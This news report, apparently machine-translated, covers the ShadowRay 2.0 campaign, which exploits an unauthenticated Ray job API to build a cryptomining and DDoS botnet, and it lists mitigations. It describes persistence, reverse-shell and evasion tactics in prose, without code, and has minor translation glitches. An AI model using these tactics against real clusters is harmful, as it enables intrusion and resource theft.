Oligo Security has warned of an ongoing attack that exploits a two-year-old security flaw in the Ray open source artificial intelligence (AI) framework to turn infected clusters powered by NVIDIA GPUs into self-replicating cryptocurrency mining botnets.
Activities called by code names Shadow Ray 2.0is the evolution of the previous wave observed between September 2023 and March 2024. The core of this attack is to exploit a critical missing authentication bug (CVE-2023-48022, CVSS score: 9.8) to take control of susceptible instances, take over their computing power, and perform illegal cryptocurrency mining using XMRig.
The vulnerability remains unpatched due to a “long-standing design decision” consistent with Ray’s development best practices, which require operations to run in isolated networks and rely on trusted code.
This campaign involves submitting malicious jobs to the unauthenticated Ray job submission API (‘/api/jobs/’) on exposed dashboards using commands ranging from simple reconnaissance to complex multi-step Bash and Python payloads. A compromised Ray cluster is then used in a spray-and-pray attack to distribute payloads to other Ray dashboards, essentially creating a worm that can infect from victim to victim.
The attack is known to utilize GitLab and GitHub to distribute the malware, creating repositories with names like “ironern440-group” and “thisisforwork440-ops” to hide the malicious payload. Both accounts are no longer accessible. However, cybercriminals have responded to takedown efforts by creating new GitHub accounts, demonstrating their tenacity and ability to quickly resume operations.
The payload then leverages the platform’s orchestration capabilities to laterally pivot to non-internet-connected nodes to spread the malware, create a reverse shell for remote control into attacker-controlled infrastructure, and establish persistence by running a cron job every 15 minutes to retrieve the latest version of the malware from GitLab to reinfect the host.
Researchers Avi Lumelsky and Gal Elbaz said the attackers “turned Ray’s legitimate orchestration functionality into a tool for a self-propagating global cryptojacking operation, autonomously spreading across exposed Ray clusters.”
This campaign may have used Large-Scale Language Models (LLM) to create GitLab payloads. This rating is based on the malware’s “structure, comments, and error handling patterns.”
The infection chain includes an explicit check to see if the victim is in China, and if so, they are served a region-specific version of the malware. It is also designed to eliminate competition by scanning and terminating the running processes of other crypto miners. This is a tactic widely employed by cryptojacking groups to maximize mining profits from their hosts.
Another notable aspect of this attack is that it uses various tactics to remain unnoticed, such as disguising the malicious process as a legitimate Linux kernel worker service and limiting CPU usage to approximately 60%. It is believed that this campaign may have been active since September 2024.
Although Ray is intended to be deployed within a “controlled network environment,” our findings show that users are exposing Ray servers to the Internet, opening up a lucrative attack surface for malicious attackers, and using open source vulnerability detection tool interact.sh to identify which Ray dashboard IP addresses are exploitable. Over 230,500 Ray servers are publicly accessible.
Anyscale, which originally developed Ray, has released the “Ray Open Ports Checker” tool to verify proper configuration of clusters to prevent accidental exposure. Other mitigation strategies include configuring firewall rules to limit unauthorized access and adding authentication to the Ray dashboard port (8265 by default).
“The attackers deployed sockstress, a TCP state depletion tool, to target production websites. This suggests that the compromised Ray clusters are being weaponized, possibly for denial of service attacks against competing mining pools or other infrastructure,” Oligo said.
“This transforms the operation from pure cryptojacking to a multipurpose botnet. The ability to launch DDoS attacks adds another monetization vector. Attackers can rent out DDoS capacity or use it to eliminate competition. Target port 3333 is commonly used by mining pools, suggesting attacks against rival mining infrastructure.”
